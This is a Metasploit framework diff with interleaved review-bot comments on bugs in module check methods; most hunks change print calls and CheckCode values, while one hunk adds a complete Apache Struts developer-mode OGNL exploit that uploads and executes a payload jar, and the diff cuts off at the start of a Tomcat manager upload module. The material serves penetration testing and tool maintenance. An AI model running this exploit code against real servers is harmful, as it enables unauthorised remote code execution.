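Review bot: The version test on the context line, `matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/`, does not express its intent: `|` has the lowest precedence, so the second alternative `([0-7][0-9].[0-9])` matches anywhere in the string without the leading `0.`, and the unescaped dots match any character. Since this expression decides between Appears and Safe, group the alternation and escape the dots: `matched[3] =~ /0\.(8[0-4]\.[0-1]|[0-7][0-9]\.[0-9])/`. The commit only changes the print calls here, and the check method begins before the hunk.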
@@ -105,20 +105,20 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as '#{user}'") + vprint_status("#{peer} - Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("#{peer} - Authenticated successfully as '#{user}'") # check access to the console - print_status("#{peer} - Checking access to the script console") + vprint_status("#{peer} - Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - print_error("#{peer} - Authentication failed") + vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 8c81bbf63d..12fbbbda2f 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -52,9 +52,6 @@ class Metasploit4 < Msf::Exploit::Remote ], self.class) end - def check - end - def lng datastore['LANGUAGE'] end diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 729a2e2d3c..a9cf6273fc 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb 
@@ -90,20 +90,20 @@ class Metasploit4 < Msf::Exploit::Remote def check res = send_serialized_request('version.bin') if res.nil? - print_error("Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code != 200 - print_error("Unable to request version, returned http code is: #{res.code.to_s}") + vprint_error("Unable to request version, returned http code is: #{res.code.to_s}") return Exploit::CheckCode::Unknown end # Check if the version is supported by this exploit - return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ - return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ - return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ + return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/ + return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/ + return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/ if res.body =~ /ServletException/ # Simple check, if we caused an exception. - print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit") + vprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit") return Exploit::CheckCode::Appears end diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index 8a695a956f..1d9210b423 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -57,17 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /
Kordil EDMS v2\.2\.60/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res.body =~ /Kordil EDMS v/ return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Safe - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") - end - return Exploit::CheckCode::Unknown + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Safe end def upload(base, file) diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index b87389353b..fc1b6cdac2 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def check target_url if @uri.empty? or @arg.empty? - print_error("Unable to get the page parameter, please reconfigure URI") + vprint_error("Unable to get the page parameter, please reconfigure URI") return end @@ -110,10 +110,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if response and response.body =~ /#{signature}/ - print_status("Signature: #{signature}") + vprint_status("Signature: #{signature}") return Exploit::CheckCode::Vulnerable else - print_error("Signature was not detected") + vprint_error("Signature was not detected") return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index ffe1732df3..da787d5622 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb 
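Review bot: In lcms_php_exec.rb the bare `return` after `vprint_error("Unable to get the page parameter, please reconfigure URI")` makes check return nil rather than a CheckCode, which callers of check do not expect; it should be `return Exploit::CheckCode::Unknown`. The commit touches only the print call on the line above, and the uri/arg parsing this depends on happens in target_url outside the hunk.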
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sqli_exec(Rex::Text.rand_text_alpha(1)) if res and res.body =~ /Error during search/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 0996cd97a4..acd70eb924 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - print_status("#{peer} - Sending check...") + vprint_status("#{peer} - Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index b000181848..0ff2944781 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Attempting to detect if the OP5 Monitor is vulnerable...") - print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") + vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") + vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index f374b6bb9b..42b2932835 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb 
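Review bot: Promoting this result from Appears to Vulnerable rests on a generic "Error during search" string returned after a single random letter is passed to sqli_exec; unless sqli_exec, which is outside the hunk, does more than send that string, an error page shows the endpoint is reachable and errors, not that the injection executes. Vulnerable should be reserved for a result the module has actually confirmed; the previous `return Exploit::CheckCode::Appears` matched the evidence this request produces.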
@@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Attempting to detect if the OP5 Monitor is vulnerable...") - print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") + vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") + vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index f14f2c997b..bc346979d8 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -97,18 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if (not res) or (res.code != 200) - print_error("Unable to make a request to: #{path}") + vprint_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown end versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ if versioncheck.nil? then - print_error("Unable to detect Openfire version") + vprint_error("Unable to detect Openfire version") return Exploit::CheckCode::Unknown end - print_status("Detected version: #{$1}.#{$2}.#{$3}") + vprint_status("Detected version: #{$1}.#{$2}.#{$3}") version = "#{$1}#{$2}#{$3}".to_i return Exploit::CheckCode::Safe if version > 360 @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Appears end def get_plugin_jar(plugin_name) diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 59f4408c39..62667b859f 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb 
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote if response.nil? CheckCode::Unknown elsif response.body =~ /#{token} ((:?\d\.?)+)/ - print_status("PHP Version #{$1}") + vprint_status("PHP Version #{$1}") return CheckCode::Vulnerable end return CheckCode::Safe diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index e571186ccf..61a67e8e40 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote # -s Display colour syntax highlighted source. def check - print_status("Checking uri #{uri}") + vprint_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri }) if response and response.code == 200 and response.body =~ /\\ normalize_uri(target_uri.path, '/js/messages.php') }) rescue - print_error("Unable to connect to server.") + vprint_error("Unable to connect to server.") return CheckCode::Unknown end if res.code != 200 - print_error("Unable to query /js/messages.php") + vprint_error("Unable to query /js/messages.php") return CheckCode::Unknown end php_version = res['X-Powered-By'] if php_version - print_status("PHP Version: #{php_version}") + vprint_status("PHP Version: #{php_version}") if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/ if $1.to_i > 5 return CheckCode::Safe @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end else - print_status("Unknown PHP Version") + vprint_status("Unknown PHP Version") end if res.body =~ /pmaversion = '(.*)';/ 
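Review bot: In `if response.nil? CheckCode::Unknown` the constant is evaluated and discarded, not returned, so a nil response falls through to `return CheckCode::Safe` and a timeout is reported as not vulnerable; it should be `return CheckCode::Unknown`. The commit only changes the print call in this hunk, and check begins before it.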
@@ -99,15 +99,17 @@ class Metasploit3 < Msf::Exploit::Remote when '3.5.8.1', '4.0.0-rc3' return CheckCode::Safe when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' - return CheckCode::Vulnerable + return CheckCode::Appears else if $1.starts_with? '3.5.' - return CheckCode::Vulnerable + return CheckCode::Appears end - return CheckCode::Unknown + return CheckCode::Detected end end + + CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 8735bf0c23..651e5e8977 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(datastore['URI']) uri << '/' if uri[-1,1] != '/' - print_status("Checking uri #{uri}") + vprint_status("Checking uri #{uri}") response = send_request_cgi({ 'method' => "POST", diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 18c96f5a25..57220832a0 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body =~ /PHPTAX by William L\. Berggren/ return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index de5cec0c88..ac5fb0e31e 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb 
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri }, 25) if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end # patched == zExceptions.NotFound return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index d2fdfdfb94..2b121e3576 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /pmwiki-2.[0.00-2.34]/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 3f133d1344..edc0b5e3fc 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index 2e47e916bc..6b1b20990d 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ 
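Review bot: `res.headers['Bobo-Exception-Type']` on the unchanged line above the new `Appears` return is evaluated without a nil guard, and, judging by the `res and …` checks the sibling modules in this commit use after the same `send_request_raw(…, 25)` call, `res` can be `nil` on a timeout, which would raise `NoMethodError` out of `check` instead of returning a code. Add `return Exploit::CheckCode::Unknown unless res` before the `if`. The enclosing `check` starts outside the hunk.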
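Review bot: The regex `/pmwiki-2.[0.00-2.34]/` on the unchanged line above the new `Appears` return is a character class rather than a version range: `[0.00-2.34]` matches one character among `0`, `.`, `0`–`2`, `3` and `4`, and the `.` before it is unescaped, so the branch fires for any `pmwiki-2.` followed by one of those characters, far beyond the 2.0.0–2.2.34 span it apparently intends. Downgrading the branch from `Vulnerable` to `Appears` does not narrow it; capture and compare the version instead, e.g. `if res and res.body =~ /pmwiki-(2\.\d+\.\d+)/ and Gem::Version.new($1) <= Gem::Version.new('2.2.34')`. The enclosing `check` starts outside the hunk.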
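Review bot: Changing the `not res or res.code != 200` branch from `Unknown` to `Safe` folds a missing response (connection failure or timeout) into "not vulnerable", the opposite of what this same commit does in php_unserialize_zval_cookie.rb, where no response now returns `Unknown` with a note that the user should retry. Split the condition: `return Exploit::CheckCode::Unknown unless res` followed by `return Exploit::CheckCode::Safe unless res.code == 200`. The same collapse is in struts_dev_mode.rb's `check` (`return CheckCode::Safe` when `res` is nil) and in openview_omniback_exec.rb, where "did not reply" returns `Safe`. The enclosing `check` starts outside the hunk.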
@@ -136,9 +136,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end # diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 27b4c3b6da..9d6b7e74f4 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")}) if res and res.body =~ /
.+qdPM ([\d])\.([\d]).+\<\/div\>/m major, minor = $1, $2 - return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70 + return Exploit::CheckCode::Appears if (major+minor).to_i <= 70 end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index 1b0d70e7d0..900616eef6 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.body =~ /SiT! Support Incident Tracker v(\d)\.(\d\d)/) ver = [ $1.to_i, $2.to_i ] - print_status("SiT! #{ver[0]}.#{ver[1]}") + vprint_status("SiT! #{ver[0]}.#{ver[1]}") if (ver[0] == 3 and ver[1] == 65) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif (ver[0] == 3 and ver[1] < 65) return Exploit::CheckCode::Appears end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 5a04dceeaf..26bb6cd764 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote end if install_path.include?("\\") - print_status("Target looks like Windows") + vprint_status("Target looks like Windows") else - print_status("Target looks like Linux") + vprint_status("Target looks like Linux") end return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 980a62bcdd..0c710b83ac 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb 
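Review bot: After this change both branches of the version test return `Exploit::CheckCode::Appears`, so the split between `ver[0] == 3 and ver[1] == 65` and `ver[0] == 3 and ver[1] < 65` no longer distinguishes anything. Collapse them into one line: `return Exploit::CheckCode::Appears if ver[0] == 3 and ver[1] <= 65`. The enclosing `check` starts and ends outside the hunk.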
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.body =~ /Splunk Inc\. Splunk/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 61124efda2..1db90c817f 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" t1 = Time.now - print_status("Asking remote server to sleep for #{sleep_time} seconds") + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") response = execute_command(check_cmd) t2 = Time.now delta = t2 - t1 diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index d2f2e17421..709cbaabe0 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? or res.code != 200 - print_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI") + vprint_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI") return Exploit::CheckCode::Unknown end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def auto_target diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb new file mode 100644 index 0000000000..6bd7c2854f --- /dev/null +++ b/modules/exploits/multi/http/struts_dev_mode.rb 
@@ -0,0 +1,142 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts Developer Mode OGNL Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache + Struts 2. The problem exists on applications running in developer mode, + where the DebuggingInterceptor allows evaluation and execution of OGNL + expressions, which allows remote attackers to execute arbitrary Java + code. This module has been tested successfully in Struts 2.3.16, Tomcat + 7 and Ubuntu 10.04. + }, + 'Author' => + [ + 'Johannes Dahse', # Vulnerability discovery and PoC + 'Andreas Nusser', # Vulnerability discovery and PoC + 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\ + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-0394'], + [ 'OSVDB', '78276'], + [ 'EDB', '18329'], + [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ], + [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Struts 2', { } ] + ], + 'DisclosureDate' => 'Jan 06 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) + ], self.class) + end + + def check + vprint_status("Testing to see if the target can evaluate our Java code...") + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = 
rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})") + + if res and res.code == 200 and res.body.to_i == sum + return Exploit::CheckCode::Vulnerable + end + + if res and res.code == 200 and res.body.to_s =~ /#{sum}/ + vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:") + vprint_line(res.body.to_s) + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def exploit + @payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar" + + upload_jar + execute_jar + end + + def upload_jar + append = 'false' + jar = payload.encoded_jar.pack + chunk_length = 384 # 512 bytes when base64 encoded + + while(jar.length > chunk_length) + java_upload_part(jar[0, chunk_length], @payload_jar, append) + jar = jar[chunk_length, jar.length - chunk_length] + append='true' + end + java_upload_part(jar, @payload_jar, append) + end + + def java_upload_part(part, filename, append = 'false') + cmd = "#f=new java.io.FileOutputStream('#(unknown)',#{append})," + cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," + cmd << "#f.close()" + execute_command(cmd) + end + + def execute_jar + cmd = "" + # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1 + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," + cmd << "#q.setAccessible(true),#q.set(null,true)," + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," + cmd << "#q.setAccessible(true),#q.set(null,false)," + # create classloader + cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()})," + # load class + cmd << "#c=#cl.loadClass('metasploit.Payload')," + # invoke main method + cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" + cmd 
<< "null,new java.lang.Object[]{new java.lang.String[0]})" + execute_command(cmd) + end + + def execute_command(cmd) + injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD" + injection.gsub!(/CMD/, cmd) + + vprint_status("Attempting to execute: #{cmd}") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s), + 'method' => 'GET', + 'vars_get' => + { + 'debug' => 'command', + 'expression' => injection + } + }) + + return res + end + + +end diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 7333dd15c3..a2999d8026 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -176,11 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote def check #initialise some base vars @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" - print_status("Performing Check...") + vprint_status("Performing Check...") sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" t1 = Time.now - print_status("Asking remote server to sleep for #{sleep_time} seconds") + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") response = execute_command(check_cmd) t2 = Time.now delta = t2 - t1 @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif delta < sleep_time return Exploit::CheckCode::Safe else - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 4a0d8c89b6..d9ad21808f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 if res.body =~ /
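Review bot: The arithmetic probe in `check` can produce a zero sum, which turns the test into a false positive: `rand_text_numeric(rand(3) + 1).to_i` is 0 for digit strings such as `0` or `00`, and when both addends are 0, `res.body.to_i == sum` holds for any 200 response whose body does not start with a digit, while the fallback `res.body.to_s =~ /#{sum}/` matches any body containing a `0`. Use non-zero addends, e.g. `addend_one = rand(1..999)` and `addend_two = rand(1..999)`, and anchor the fallback match with `/\b#{sum}\b/`. The method also mixes `Exploit::CheckCode::Vulnerable` and `CheckCode::Safe`; use one form of the constant throughout `check`.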

Company logo\s+
TestLink 1\.9\.3/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end end end @@ -81,9 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project
Home<\/a>
/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 1e3a9888d1..12c2423529 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect return CheckCode::Unknown if res.nil? if (res.code.between?(400, 499)) - print_error("Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -128,8 +128,8 @@ class Metasploit3 < Msf::Exploit::Remote :active => true ) - print_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}") - return CheckCode::Vulnerable + vprint_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}") + return CheckCode::Appears end def auto_target diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb new file mode 100644 index 0000000000..700f280cbb --- /dev/null +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb 
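Review bot: The trailing `return Exploit::CheckCode::Safe` added after `end` is unreachable: the `begin` block ends with an unconditional `return Exploit::CheckCode::Safe`, and the `rescue` clause now returns `Unknown`, so no path reaches the statement after the block. Drop the trailing return, or turn the in-block `return` into a plain `Exploit::CheckCode::Safe` value and keep a single exit point. The `begin` that this `rescue` closes opens outside the hunk.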
@@ -0,0 +1,426 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } + + CSRF_VAR = 'CSRF_NONCE=' + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on Apache Tomcat servers that + have an exposed "manager" application. The payload is uploaded as a WAR archive + containing a jsp application using a POST request against the /manager/html/upload + component. + + NOTE: The compatible payload sets vary based on the selected target. For + example, you must select the Windows target to use native Windows payloads. + }, + 'Author' => 'rangercha', + 'License' => MSF_LICENSE, + 'References' => + [ + # This is based on 